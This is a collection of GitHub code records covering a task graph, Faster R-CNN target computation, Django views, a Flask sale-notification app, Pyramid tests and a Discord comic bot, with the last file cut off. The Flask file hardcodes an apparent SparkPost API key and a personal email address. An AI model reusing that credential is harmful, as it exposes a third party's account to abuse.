self.has_cycle()\n if cycle:\n raise ValueError('Found circle in TaskGraph: ' + ' -> '.join([t.name for t in cycle]))\n\n Visualizer(\n graph=self,\n title=title,\n callback=callback,\n log_formatter=log_formatter,\n exit_on_success=exit_on_success\n ).run()\n\n def has_task(self, task):\n \"\"\"Whether a task is in this graph\"\"\"\n return task in self.tasks\n\n def has_cycle(self):\n \"\"\"Returns a list of tasks contained in a cycle if there is one or None if no cycle.\"\"\"\n cycle = None\n\n task2visited = {t: False for t in self.tasks}\n task2on_stack = {t: False for t in self.tasks}\n task2on_stack_dep = {t: None for t in self.tasks}\n\n def dfs(t):\n nonlocal cycle\n task2visited[t] = True\n task2on_stack[t] = True\n for w in self.task2waiting_for[t]:\n if cycle:\n return\n elif not task2visited[w]:\n task2on_stack_dep[t] = w\n dfs(w)\n elif task2on_stack[w]:\n cycle = []\n v = w\n while v != t:\n cycle.append(v)\n v = task2on_stack_dep[v]\n cycle += [t, w]\n task2on_stack[t] = False\n\n for t in self.tasks:\n if not task2visited[t]:\n dfs(t)\n\n return cycle\n\n @classmethod\n def linear_graph_from_list(cls, tasks):\n \"\"\"A hepler function to create a graph of tasks with linear dependency\"\"\"\n graph = cls()\n for t in tasks:\n graph.add_task(t)\n for t1, t2 in zip(tasks[:-1], tasks[1:]):\n graph.add_dependency(t2, waiting_for=t1)\n return graph\n","repo_name":"CtheSky/gtui","sub_path":"gtui/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"53"} +{"seq_id":"6050298272","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 6 15:20:04 2018\r\n\r\n@author: LongJun\r\n\"\"\"\r\nimport config as cfg\r\nfrom anchor_label import calculate_IOU\r\nimport numpy as np\r\nimport numpy.random as npr\r\ndef proposal_target(rpn_rois, rpn_scores, gt_boxes, _num_classes, gt_cls):\r\n \"\"\" Fast/Faster rcnn proposal_target layer, used for computing the target of convergence\"\"\"\r\n all_rois = rpn_rois\r\n all_scores = rpn_scores\r\n num_images = 1\r\n rois_per_image = cfg.dect_train_batch/ num_images\r\n fg_rois_per_image = np.round(cfg.dect_fg_rate* rois_per_image)\r\n labels, rois, roi_scores, bbox_targets, bbox_inside_weights = _sample_rois(\\\r\n all_rois, all_scores, gt_boxes, fg_rois_per_image,\\\r\n rois_per_image, _num_classes, gt_cls)\r\n rois = rois.reshape(-1, 5) \r\n roi_scores = roi_scores.reshape(-1) \r\n labels = labels.reshape(-1, 1) \r\n bbox_targets = bbox_targets.reshape(-1, _num_classes * 4) \r\n bbox_inside_weights = bbox_inside_weights.reshape(-1, _num_classes * 4)\r\n bbox_outside_weights = np.array(bbox_inside_weights > 0).astype(np.float32)\r\n return rois, roi_scores, labels, bbox_targets, bbox_inside_weights, bbox_outside_weights\r\n \r\n \r\ndef _get_bbox_regression_labels(bbox_target_data, num_classes):\r\n \"\"\" compute the bbox_targets and bbox_inside_weights\r\n ie, tx*,ty*,tw*,th* and which bbox_target to be used in loss compute\"\"\"\r\n clss = bbox_target_data[:, 0]\r\n bbox_targets = np.zeros((clss.size, 4 * num_classes), dtype=np.float32) \r\n bbox_inside_weights = np.zeros(bbox_targets.shape, dtype=np.float32)\r\n inds = np.where(clss > 0)[0] \r\n for ind in inds:\r\n cls = clss[ind]\r\n start = int(4 * cls)\r\n end = start + 4\r\n bbox_targets[ind, start:end] = bbox_target_data[ind, 1:]\r\n bbox_inside_weights[ind, start:end] = cfg.roi_input_inside_weight\r\n return bbox_targets,bbox_inside_weights\r\n \r\ndef _sample_rois(all_rois, all_scores, gt_boxes, fg_rois_per_image, rois_per_image, num_classes, gt_cls): \r\n \"\"\" rois sample process: clip to the image boundary, nms, bg_fg sample\"\"\"\r\n overlaps = calculate_IOU(all_rois[:, 1:5], gt_boxes)\r\n gt_assignment = overlaps.argmax(axis=1)\r\n max_overlaps = overlaps.max(axis=1)\r\n labels = gt_cls[gt_assignment]\r\n fg_inds = np.where(max_overlaps >= cfg.fg_thresh)[0]\r\n bg_inds = np.where((max_overlaps < cfg.bg_thresh_hi) &(max_overlaps >= cfg.bg_thresh_lo))[0]\r\n #print(np.sum(fg_inds), np.sum(bg_inds))\r\n if fg_inds.size > 0 and bg_inds.size > 0: \r\n fg_rois_per_image = min(fg_rois_per_image, fg_inds.size) \r\n fg_inds = npr.choice(fg_inds, size=int(fg_rois_per_image), replace=False) \r\n bg_rois_per_image = rois_per_image - fg_rois_per_image \r\n to_replace = bg_inds.size < bg_rois_per_image\r\n bg_inds = npr.choice(bg_inds, size=int(bg_rois_per_image), replace=to_replace) \r\n elif fg_inds.size > 0:\r\n to_replace = fg_inds.size < rois_per_image\r\n fg_inds = npr.choice(fg_inds, size=int(rois_per_image), replace=to_replace)\r\n fg_rois_per_image = rois_per_image\r\n elif bg_inds.size > 0:\r\n to_replace = bg_inds.size < rois_per_image\r\n bg_inds = npr.choice(bg_inds, size=int(rois_per_image), replace=to_replace)\r\n fg_rois_per_image = 0\r\n else:\r\n import pdb\r\n pdb.set_trace()\r\n keep_inds = np.append(fg_inds, bg_inds)\r\n labels = labels[keep_inds] \r\n labels[int(fg_rois_per_image):] = 0\r\n rois = all_rois[keep_inds]\r\n roi_scores = all_scores[keep_inds]\r\n \r\n \r\n bbox_target_data = _compute_targets(rois[:, 1:5], gt_boxes[gt_assignment[keep_inds], :], labels)\r\n \r\n \r\n bbox_targets, bbox_inside_weights = _get_bbox_regression_labels(bbox_target_data, num_classes)\r\n return labels, rois, roi_scores, bbox_targets, bbox_inside_weights\r\n\r\ndef _compute_targets(ex_rois, gt_rois, labels):\r\n \"\"\"Compute bounding-box regression targets for an image.\"\"\"\r\n\r\n assert ex_rois.shape[0] == gt_rois.shape[0]\r\n assert ex_rois.shape[1] == 4\r\n assert gt_rois.shape[1] == 4\r\n\r\n targets = bbox_transform(ex_rois, gt_rois) \r\n if cfg.bbox_nor_target_pre:\r\n \r\n targets = ((targets - np.array(cfg.bbox_nor_mean))/np.array(cfg.bbox_nor_stdv)) \r\n return np.hstack((labels[:, np.newaxis], targets)).astype(np.float32, copy=False)\r\n \r\ndef bbox_transform(ex_rois, gt_rois):\r\n \"\"\" convert the coordinate of gt_rois into targets form using ex_rois \"\"\"\r\n ex_widths = ex_rois[:, 2] - ex_rois[:, 0] + 1.0\r\n ex_heights = ex_rois[:, 3] - ex_rois[:, 1] + 1.0\r\n ex_ctr_x = ex_rois[:, 0] + 0.5 * ex_widths\r\n ex_ctr_y = ex_rois[:, 1] + 0.5 * ex_heights\r\n\r\n gt_widths = gt_rois[:, 2] - gt_rois[:, 0] + 1.0\r\n gt_heights = gt_rois[:, 3] - gt_rois[:, 1] + 1.0\r\n gt_ctr_x = gt_rois[:, 0] + 0.5 * gt_widths\r\n gt_ctr_y = gt_rois[:, 1] + 0.5 * gt_heights\r\n\r\n targets_dx = (gt_ctr_x - ex_ctr_x) / ex_widths \r\n targets_dy = (gt_ctr_y - ex_ctr_y) / ex_heights \r\n targets_dw = np.log(gt_widths / ex_widths)\r\n targets_dh = np.log(gt_heights / ex_heights)\r\n\r\n targets = np.vstack(\r\n (targets_dx, targets_dy, targets_dw, targets_dh)).transpose()\r\n return targets\r\n \r\n","repo_name":"LongJun123456/Faster-rcnn-tensorflow","sub_path":"rois_target.py","file_name":"rois_target.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"53"} +{"seq_id":"29461206878","text":"from django.views.generic import TemplateView\nfrom isoweek import Week # noqa\nimport pandas # noqa\nfrom routine.models import WorkoutDailyRoutine # noqa\nfrom .models import Workout\nfrom django.db.models import Q\nfrom core.libs.global_functions import calc_min_or_hour # noqa\nfrom dal import autocomplete # noqa\nfrom django.db.models import Q # noqa\n\n\ndef get_or_create_routine(date):\n \"\"\"Returns an existing object or creates a new one if not\n\n Args:\n\n date (date): date\n\n Returns:\n\n object: WorkoutDailyRoutine object\n \"\"\"\n obj, created = WorkoutDailyRoutine.objects.get_or_create(date=date)\n if created:\n return created\n return obj\n\n\ndef get_weekly_routines(start_date, end_date):\n \"\"\"Returns a list of routines between two dates\n\n Args:\n\n start date (date): start date of routines\n end date (date): end date of routines\n\n Returns:\n\n list: filtered list of WorkoutDailyRoutine objects\n \"\"\"\n for day in pandas.date_range(start_date, end_date):\n get_or_create_routine(day)\n return WorkoutDailyRoutine.objects.filter(\n Q(date__gte=start_date) &\n Q(date__lte=end_date)).order_by('date')\n\n\ndef get_min_weekly_workouts(routines, filter_to=None):\n \"\"\"Return the amount of minutes/hours per given routines (for a week)\n in total or filtered by done or not done\n\n Args:\n\n routines (list): list of WorkoutDailyRoutine objs\n filter to (boolean, optional): workoutplan filter that can be True\n or False. Defaults to None.\n\n Returns:\n\n int: minutes\n str: time (hour:h or minutes:m)\n \"\"\"\n minutes = 0\n for routine in routines:\n if filter_to or filter_to is not None:\n for plan in routine.workoutplan_set.filter(done=filter_to):\n minutes += plan.workout.time_in_min\n else:\n for plan in routine.workoutplan_set.all():\n minutes += plan.workout.time_in_min\n return minutes\n\n\ndef get_nr_of_routines(routines, filter_to=None):\n \"\"\"Returns the number of workouts in set of given routines\n\n Args:\n\n routines (list): list of WorkoutDailyRoutine objects\n filter to (boolean, optional): workoutplan filter that can be True\n or False. Defaults to None.\n\n Returns:\n\n int: number of routines\n \"\"\"\n nr = 0\n for routine in routines:\n if filter_to or filter_to is not None:\n for plan in routine.workoutplan_set.filter(done=filter_to):\n nr += 1\n else:\n for plan in routine.workoutplan_set.all():\n nr += 1\n return nr\n\n\ndef get_diff_min_to_prev_week(min_current, min_previous):\n \"\"\"Calculates the difference in percentage from current week:day compared\n to a previous week:day\n\n Args:\n\n min current (float): sum of minutes of current period of time\n min previous (float): sum of minutes of previous period of time\n\n Returns:\n\n int: difference in %\n \"\"\"\n increase = min_current - min_previous\n try:\n return round(increase / min_previous * 100, 2)\n except Exception:\n if min_current > 0:\n return 100\n return 0\n\n\nclass WorkoutView(TemplateView):\n template_name = 'workout/workout.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n # ! IMPORTANT\n \"\"\"get week_nr from url\"\"\"\n _selected_week = self.kwargs['week_nr']\n _selected_year = self.kwargs['week_year']\n _week = Week(_selected_year, _selected_week)\n _previous_week = Week(_selected_year, _selected_week-1)\n weeknumber = _week.week\n routines = get_weekly_routines(_week.monday(), _week.sunday())\n _routines_prev_week = get_weekly_routines(_previous_week.monday(),\n _previous_week.sunday())\n\n _min_workouts = get_min_weekly_workouts(routines)\n _min_workouts_done = get_min_weekly_workouts(routines, True)\n _min_workouts_todo = get_min_weekly_workouts(routines, False)\n\n _min_workouts_prev_week = get_min_weekly_workouts(\n _routines_prev_week)\n\n context['selected_week'] = weeknumber\n context['selected_year'] = _selected_year\n context['weekly_routines'] = routines\n\n context['tot_h'] = calc_min_or_hour(_min_workouts)\n context['tot_h_done'] = calc_min_or_hour(_min_workouts_done)\n context['tot_h_to_todo'] = calc_min_or_hour(_min_workouts_todo)\n context['nr_workouts'] = get_nr_of_routines(routines)\n context['nr_workouts_done'] = get_nr_of_routines(routines, True)\n context['nr_workouts_todo'] = get_nr_of_routines(routines, False)\n context['diff_to_prev_week'] = get_diff_min_to_prev_week(\n _min_workouts, _min_workouts_prev_week)\n\n return context\n\n\nclass WorkoutAutocomplete(autocomplete.Select2QuerySetView):\n def get_queryset(self):\n qs = Workout.objects.all()\n\n if self.q:\n qs = qs.filter(\n Q(types__name__icontains=self.q) |\n Q(name__icontains=self.q)\n )\n\n return qs\n","repo_name":"Licceeee/learning-material-django","sub_path":"project/workout/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5272917803","text":"from flask import Flask\nfrom flask import json\nfrom flask import request\nfrom flask_cors import CORS, cross_origin\nfrom sparkpost import SparkPost\nimport helper\nimport algo\n\napp = Flask(__name__)\nCORS(app)\n\n# app.run(host='127.0.0.1', port=8000)\n\n@app.route('/')\ndef helloWorld():\n return \"helloWorld\"\n\n@app.route('/test/')\ndef test():\n code = int(request.args[\"gender\"])\n\n if code == 1:\n return \"Female\"\n elif code == 2:\n return \"Male\"\n elif code == 3:\n return \"Nonbinary\"\n elif code == 4:\n return \"Other\"\n else:\n return \"Prefer not to say\"\n\n@app.route(\"/api/getSale/\")\ndef getSale():\n ageMin = request.args[\"ageMin\"]\n ageMax = request.args[\"ageMax\"]\n gender = request.args[\"gender\"]\n ethnicity = request.args[\"ethnicity\"]\n efficiency = request.args[\"efficiency\"]\n coverage = request.args[\"coverage\"]\n discount = request.args[\"discount\"]\n zipcode = request.args[\"zipcode\"]\n if efficiency == \"true\":\n return getEfficientSale(ageMin, ageMax, gender, ethnicity, coverage, zipcode, discount)\n else:\n return algo.getRegSale(ageMin, ageMax, gender, ethnicity, coverage, zipcode, discount)\n return 'Hello'\n\n@app.route(\"/api/changePrice\", methods=['POST'])\ndef changePrice():\n item = request.form[\"item\"]\n price = request.form[\"price\"]\n iData = helper.getItemDataFromFirebasez()\n if iData[item][\"price\"] > price:\n iData[item][\"price\"] = price\n name = iData[item][\"name\"]\n #PUSH ITEM DATA HERE\n sp = SparkPost(\"a6280abfffa83de5381bb5d87cfc6eb9f4fab70e\")\n response = sp.transmissions.send(\n use_sandbox=False,\n recipients=['vincentwsong@gmail.com'],\n html='

    Your item, ' + name + ' is now on sale!

    ',\n from_email='nordstrom@vwsong.com',\n subject='Hello from Nordstrom/SparkPost!'\n )\n return \"item price updated, emails sent out!\"\n\n return \"item price updated!\"\n\n@app.route(\"/api/addSimulationData\", methods=[\"GET\"])\ndef addSimulationData():\n output = algo.simulationData()\n return output + \" added\"\n\n@app.route(\"/api/subscribe\", methods=['POST'])\ndef redisAddCustomerData():\n r = redis.StrictRedis(host=\"127.0.0.1\", port=6379, db=0)\n s = request.get_json(silent=True)\n print(s)\n customerID = s['customerID']\n age = s['age']\n gender = s['gender']\n ethnicity = s['ethnicity']\n zipcode = s['zipcode']\n print(\"ayo1\")\n # phone = s['phone']\n # email = s['email']\n savedItemIDs = s['savedItemIDs']\n print(savedItemIDs)\n r.hset(customerID,\"age\", age)\n r.hset(customerID,\"gender\", gender)\n r.hset(customerID,\"ethnicity\", ethnicity)\n r.hset(customerID,\"zipcode\", gender)\n print(\"ayo2\")\n # r.hset(customerID,\"phone\", phone)\n # r.hset(customerID, \"email\", email)\n r.hset(customerID,\"gender\", gender)\n print(\"ayo3\")\n for x in savedItemIDs:\n r.sadd('interestList-'+ str(x), customerID)\n return 'Hello'\n","repo_name":"vwsong/smartsales","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23863591153","text":"import pytest\nfrom pyramid import testing\n\nENTRIES = {\n 1: {\"id\": 1, \"title\": \"Today, Dec. 16, I learned.\", \"creation_date\": \"12/16/2016\", \"body\": \"Sample text\"},\n 2: {\"id\": 2, \"title\": \"Today, Dec. 17, I learned.\", \"creation_date\": \"12/17/2016\", \"body\": \"Sample text\"},\n 3: {\"id\": 3, \"title\": \"Today, Dec. 18, I learned.\", \"creation_date\": \"12/18/2016\", \"body\": \"Sample text\"},\n 4: {\"id\": 4, \"title\": \"Today, Dec. 19, I learned.\", \"creation_date\": \"12/19/2016\", \"body\": \"Sample text\"},\n 5: {\"id\": 5, \"title\": \"Today, Dec. 20, I learned.\", \"creation_date\": \"12/20/2016\", \"body\": \"Sample text\"},\n}\n\n\n@pytest.fixture\ndef req():\n \"\"\"Dummy request fixture.\"\"\"\n return testing.DummyRequest()\n\n\ndef test_homepage_renders_file_data(req):\n \"\"\"Ensure my homepage view returns some data.\"\"\"\n from .views import homepage\n response = homepage(req)\n assert \"ENTRIES\" in response\n\n\ndef test_homepage_page_has_iterable(req):\n \"\"\"Ensure my homepage view returns some iterable data.\"\"\"\n from .views import homepage\n response = homepage(req)\n assert hasattr([\"ENTRIES\"], \"__iter__\")\n\n\n# def test_edit_page_renders_file_data(req):\n# \"\"\"Ensure my edit-post page view returns some data.\"\"\"\n# from .views import edit\n# response = edit(req)\n# assert \"ENTRIES\" in response\n\n\n# def test_update_page_has_iterable(req):\n# \"\"\"Ensure my edit-post page view returns some iterable data.\"\"\"\n# from .views import edit\n# response = edit(req)\n# assert hasattr([\"ENTRIES\"], \"__iter__\")\n\n\ndef test_write_page_renders_file_data(req):\n \"\"\"Ensure my write-new-post page returns some data.\"\"\"\n from .views import write\n response = write(req)\n assert \"ENTRIES\" in response\n\n\ndef test_write_page_has_iterable(req):\n \"\"\"Ensure my create page view returns some iterable data.\"\"\"\n from .views import write\n response = write(req)\n assert hasattr([\"ENTRIES\"], \"__iter__\")\n\n\n# def test_detail_page_renders_file_data(req):\n# \"\"\"Ensure my home page view returns some data.\"\"\"\n# from .views import detail\n# response = detail(req)\n# assert \"ENTRIES\" in response\n\n\n# def test_detail_page_has_iterable(req):\n# \"\"\"Ensure my jinja2 page view returns some iterable data.\"\"\"\n# from .views import detail\n# response = detail(req)\n# assert hasattr([\"ENTRIES\"], \"__iter__\")\n\n\n@pytest.fixture\ndef testapp():\n \"\"\"Test App fixture.\"\"\"\n from webtest import TestApp\n from learning_journal_basic import main\n app = main({})\n return TestApp(app)\n\n\ndef test_index_page_exists(testapp):\n \"\"\"Homepage should exist.\"\"\"\n response = testapp.get(\"/\", status=200)\n html = response.html\n assert \"An index of entries.\" in html.find('header').text\n\n\ndef test_detail_page_exists(testapp):\n \"\"\"Detail page should exist.\"\"\"\n response = testapp.get(\"/journal/1\", status=200)\n html = response.html\n assert \"The what and the how of the day.\" in html.find('header').text\n\n\ndef test_edit_form_page_exists(testapp):\n \"\"\"Edit page should exist.\"\"\"\n response = testapp.get(\"/journal/3/editentry\", status=200)\n html = response.html\n assert \"Make amends. Add, correct, extend.\" in html.find('header').text\n\n\ndef test_write_page_exists(testapp):\n \"\"\"New Form page should exist.\"\"\"\n response = testapp.get(\"/journal/write\", status=200)\n html = response.html\n assert \"Reflect, record. What got learned?\" in html.find('header').text\n","repo_name":"rveeblefetzer/learning-journal-basic","sub_path":"learning_journal_basic/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14423662918","text":"from datetime import datetime, timedelta, timezone\nfrom typing import Iterable, Optional\n\nimport discord\nfrom discord import app_commands\nfrom discord.ext import commands, tasks\n\nfrom bdbot.discord_utils import (\n SERVER,\n NextSend,\n clean_database,\n create_embed,\n is_owner,\n logger,\n run_blocking,\n send_chan_embed,\n send_mention,\n send_message,\n)\nfrom bdbot.utils import (\n COMIC_LATEST_LINKS_PATH,\n DATABASE_FILE_PATH,\n Action,\n Date,\n date_to_db,\n get_hour,\n get_last_corresponding_date,\n get_today,\n link_cache,\n load_json,\n parse_all,\n restore_backup,\n save_backup,\n save_json,\n strip_details,\n)\nfrom bdbot.Web_requests_manager import get_new_comic_details\n\n\nclass PosterHandler(commands.Cog):\n \"\"\"\n Manages automatic posting of hourly comic strips\n \"\"\"\n\n def __init__(self, bot: discord.Client):\n \"\"\"\n Construct the cog.\n\n :param bot: The discord bot\n \"\"\"\n self.bot: discord.Client = bot\n self.do_cleanup: bool = True\n\n # @app_commands.command(hidden=True, guilds=SERVER)\n # @app_commands.is_owner()\n async def start_hourly(self, inter: discord.Interaction):\n \"\"\"Starts the PosterHandler loop\"\"\"\n await send_message(\n inter, \"Hourly loop started! Hourly comics are posted at each hour.\"\n )\n\n await PosterHandler.wait_for_next_hour(self)\n\n async def wait_for_next_hour(self):\n \"\"\"Wait for the time to restart the hourly loop\"\"\"\n sleep_date = datetime.now(timezone.utc).replace(\n minute=0, second=0, microsecond=0\n ) + timedelta(hours=1)\n await discord.utils.sleep_until(sleep_date)\n await PosterHandler.post_hourly.start(self)\n\n @app_commands.command()\n @app_commands.guilds(SERVER.id)\n @commands.is_owner()\n async def force_hourly(\n self, inter: discord.Interaction, hour: Optional[int] = None\n ):\n \"\"\"Force the push of comics to all subscribed servers\n\n\n :param inter: The context of the where the command was called.\n :param hour: The hour to simulate\n \"\"\"\n await inter.response.send_message(\n f\"Trying to force the hourly post for hour {get_hour() if not hour else hour}h UTC\"\n )\n await self.hourly(hour)\n\n @tasks.loop(hours=1)\n async def post_hourly(self):\n \"\"\"Loop to post hourly comics\"\"\"\n try:\n await self.hourly()\n except Exception as e:\n logger.error(str(e))\n\n async def hourly(self, hour: Optional[int] = None):\n \"\"\"Post hourly comics\"\"\"\n logger.info(\"Starting automatic poster...\")\n comic_data: dict = load_json(DATABASE_FILE_PATH)\n comic_list: dict = {}\n comic_keys: list[str] = list(strip_details.keys())\n post_days = [Date.Daily, get_today()]\n\n if not hour:\n hour = get_hour()\n hour = str(hour)\n\n if hour == \"6\":\n save_backup(comic_data, logger)\n\n if self.do_cleanup:\n clean_database(data=comic_data, logger_=logger)\n\n # Construct the list of what comics need to be sent\n logger.info(\"Constructing guild info....\")\n for guild in comic_data:\n guild_data = comic_data[guild]\n await run_blocking(\n self.get_comic_info_for_guild,\n self.bot,\n guild_data,\n comic_list,\n post_days,\n hour,\n )\n\n logger.info(\"Sending comics....\")\n await self.check_comics_and_post(comic_list, strip_details, comic_keys)\n\n save_json(link_cache, COMIC_LATEST_LINKS_PATH) # Saves the link cache\n\n logger.info(\"Finished automatic poster.\")\n\n def get_comic_info_for_guild(\n self, guild_data: dict, comic_list: dict, post_days: Iterable[Date], hour: str\n ):\n \"\"\"Get the comic info for each server. This method mutate 'comic_list' for each comic.\n\n :param guild_data: All the information of the server\n :param comic_list: The information about where to post each comic and how\n :param post_days: The days to check for\n :param hour: The current hour\n \"\"\"\n if \"channels\" in guild_data:\n for channel in guild_data[\"channels\"]:\n\n # First check if it wants only the latest comics\n if \"latest\" in guild_data[\"channels\"][channel]:\n latest_comics: list[int] = guild_data[\"channels\"][channel][\"latest\"]\n comic_list: dict = self.set_comic_to_post(\n guild_data, channel, comic_list, latest_comics, hour, True\n )\n\n # Then check if the comic is wanted for a specific time\n for day in post_days:\n str_date = date_to_db(day)\n if \"date\" in guild_data[\"channels\"][channel]:\n if str_date in guild_data[\"channels\"][channel][\"date\"]:\n if (\n hour\n in guild_data[\"channels\"][channel][\"date\"][str_date]\n ):\n hour_specific_comics: list[int] = guild_data[\n \"channels\"\n ][channel][\"date\"][str_date][hour]\n comic_list: dict = self.set_comic_to_post(\n guild_data,\n channel,\n comic_list,\n hour_specific_comics,\n hour,\n )\n\n def set_comic_to_post(\n self,\n guild_data: dict,\n channel: str,\n comic_list: dict,\n comics_to_add: list[int],\n hour: str,\n latest: bool = False,\n ) -> dict:\n \"\"\"Set one comic to post on one channel\n\n :param guild_data: All the information of the server\n :param channel: The string of the ID of the channel to post the comics\n :param comic_list: The information about where to post each comic and how\n :param comics_to_add: The comic number to check for\n :param hour: The current hour\n :param latest: If to add latest comics\n \"\"\"\n if channel not in comic_list:\n # Assure no duplicates\n to_mention = guild_data[\"mention\"]\n role: Optional[discord.Role] = None\n\n if (\n (\"only_daily\" in guild_data)\n and (not guild_data[\"only_daily\"] or hour == \"6\")\n and (\"role\" in guild_data)\n and to_mention\n ):\n # Check if:\n # - A role is set\n # - The role can be mentioned anytime, or it is 6 AM UTC\n # - And the guild wants to be mentioned\n role = discord.Guild.get_role(\n self.bot.get_guild(guild_data[\"server_id\"]), guild_data[\"role\"]\n )\n\n comic_list.update(\n {\n channel: {\n \"channel\": channel,\n \"comics\": comics_to_add if not latest else [],\n \"latest_comics\": comics_to_add if latest else [],\n \"role\": role,\n \"hasBeenMentioned\": False,\n \"wantMention\": to_mention,\n }\n }\n )\n else:\n comic_list[channel][\"comics\" if not latest else \"latest_comics\"].extend(\n comics_to_add\n )\n\n return comic_list\n\n async def check_comics_and_post(\n self,\n comic_list: dict,\n comic_details: dict,\n comic_keys: list[str],\n called_channel: Optional[discord.TextChannel] = None,\n post_time: datetime = datetime.now(timezone.utc),\n ):\n \"\"\"Load comics and check if they are the latest ones.\n Finally, post the comic to the channels.\n\n :param comic_list: The information about where to post each comic and how\n :param comic_details: The details of the comic strip\n :param comic_keys: The name of all the comics\n :param called_channel: The channel of where the command was sent from (Should be None for the hourly poster\n and filled when called manually)\n :param post_time: The post time\n \"\"\"\n available_channels = {}\n not_available_channels = {}\n nb_of_comics_posted = 0\n # Check if any guild want the comic\n for i in range(len(comic_details)):\n count = 0\n for chan in comic_list:\n if (\n i in comic_list[chan][\"comics\"]\n or i in comic_list[chan][\"latest_comics\"]\n ):\n count += 1\n break\n\n if count > 0:\n # Get the details of the comic\n comic_details: Optional[dict]\n try:\n comic_details = await run_blocking(\n get_new_comic_details,\n self.bot,\n strip_details[comic_keys[i]],\n Action.Today,\n latest_check=True,\n )\n except Exception as e:\n # Anything can happen (connection problem, etc... and the bot will crash if any error\n # is raised in the poster loop)\n logger.error(f\"An error occurred while getting a comic: {e}\")\n comic_details = None\n\n embed = create_embed(comic_details) # Creates the embed\n\n is_latest: bool\n if comic_details is not None:\n is_latest = comic_details[\"is_latest\"]\n else:\n is_latest = False\n\n if is_latest and called_channel is None:\n # Only updates the link cache if it is done during the hourly loop\n link_cache[comic_details[\"Name\"]] = comic_details[\"img_url\"]\n\n for channel in comic_list:\n # Finally, sends the comic\n nb_of_comics_posted += await self.load_channel_and_send(\n i,\n comic_list,\n channel,\n embed,\n is_latest,\n available_channels,\n not_available_channels,\n called_channel,\n post_time,\n )\n if called_channel is None:\n # Only logs the hourly loop at the end\n logger.info(\n f\"The hourly loop sent {nb_of_comics_posted} comic(s) the \"\n f\"{datetime.now().strftime('%dth of %B %Y at %Hh')}\"\n )\n if called_channel is not None and nb_of_comics_posted == 0:\n # If it was called manually ('post' command), and there is no comics to post anywhere in the guild,\n # it will warn in the channel that no comics needed to be sent, and it will conclude\n await called_channel.send(\"No comics to send!\")\n\n async def load_channel_and_send(\n self,\n comic_number: int,\n comic_list: dict,\n channel: str,\n embed: discord.Embed,\n is_latest: bool,\n available_channels: dict,\n not_available_channels: dict,\n called_channel: Optional[discord.TextChannel] = None,\n post_time: datetime = datetime.now(timezone.utc),\n ) -> int:\n \"\"\"Sends the loaded comic to the specified channel\n\n :param comic_number: The number of the comic to send\n :param comic_list: The information about where to post each comic and how\n :param channel: The channel where to send the comic to\n :param embed: The embed with the comic\n :param is_latest: If the comic is the latest one\n :param available_channels: The dictionary of available channels\n :param not_available_channels: The dictionary of not-available channels\n :param called_channel: The channel of the where the command was called (None in the hourly loop,\n filled when called through /post).\n :param post_time: The post time\n\n :returns: 1 if it posted a comic, 0 if it could/did not\n \"\"\"\n latest_comics = comic_list[channel][\"latest_comics\"]\n this_hour_comics = comic_list[channel][\"comics\"]\n\n # Check if the comic is wanted\n if not (comic_number in this_hour_comics or comic_number in latest_comics):\n return 0\n\n # Check if the comic is the latest and if it even cares about the latest comic\n if (\n comic_number not in this_hour_comics\n and comic_number in latest_comics\n and not is_latest\n ):\n return 0\n\n # Then, gets the channel object by its ID\n channel_id = int(comic_list[channel][\"channel\"])\n\n if channel_id not in available_channels:\n # Retrieves the channel object by the discord client\n chan = self.bot.get_channel(channel_id)\n # And save it for future use (so it can be looked up later)\n available_channels.update({channel_id: chan})\n else:\n # Use the cached channel object\n chan = available_channels.get(channel_id)\n\n if (\n chan is not None\n and channel_id not in not_available_channels\n and chan.permissions_for(\n chan.guild.get_member(self.bot.user.id)\n ).send_messages\n ):\n # Makes sure that the channel is available (e.g. channel object is not None and the bot\n # can send messages)\n try:\n await send_mention(chan, channel, comic_list, post_time)\n\n # Sends the comic embed (most important)\n await send_chan_embed(chan, embed)\n return 1\n except Exception as e:\n # There is too many things that can go wrong here, just catch everything\n error_msg = f\"An error occurred in the hourly poster: {e.__class__.__name__}: {e}\"\n logger.error(error_msg)\n\n if called_channel is not None:\n # Send the error message to the channel too\n await called_channel.send(error_msg)\n else:\n # Remembers that the channel is not available\n not_available_channels.update({channel_id: None})\n if called_channel is not None:\n # If it can, send a message to the channel if an error occurred\n if chan is None:\n chan = comic_list[channel][\"channel\"]\n else:\n chan = chan.mention\n\n await called_channel.send(f\"Could not send message to channel {chan}\")\n else:\n # Logs that a channel is not available but still signed up for a comic\n logger.warning(\n f\"A comic could not be posted to a channel. Channel id: {channel_id}\"\n )\n # If it encountered an issue or there is no comic to send, return 0\n return 0\n\n @app_commands.command()\n @app_commands.checks.has_permissions(manage_guild=True)\n @app_commands.guild_only()\n async def post(\n self, inter: discord.Interaction, date: Date = None, hour: int = None\n ):\n \"\"\"Force the comic post for a single server.\n\n :param inter: The interaction of the where the command was called.\n :param date: The date to simulate\n :param hour: The hour to simulate\n \"\"\"\n comic_data: dict = load_json(DATABASE_FILE_PATH)\n comic_list: dict = {}\n comic_keys: list[str] = list(strip_details.keys())\n guild_id: str = str(inter.guild.id)\n\n if guild_id in comic_data:\n # Gets date and hour of force post\n final_date, final_hour = parse_all(\n date,\n hour,\n default_date=get_today(),\n default_hour=get_hour(),\n )\n await send_message(\n inter,\n f\"Looking for comics to post for date: {final_date.value} at \"\n f\"{final_hour}h UTC\",\n )\n post_days = (Date.Daily, final_date)\n final_hour = str(final_hour)\n post_time = get_last_corresponding_date(final_date, final_hour)\n\n # Gets the comic info for the guild\n await run_blocking(\n self.get_comic_info_for_guild,\n self.bot,\n comic_data[guild_id],\n comic_list,\n post_days,\n final_hour,\n )\n # If there is comic to send\n if len(comic_list) > 0:\n await 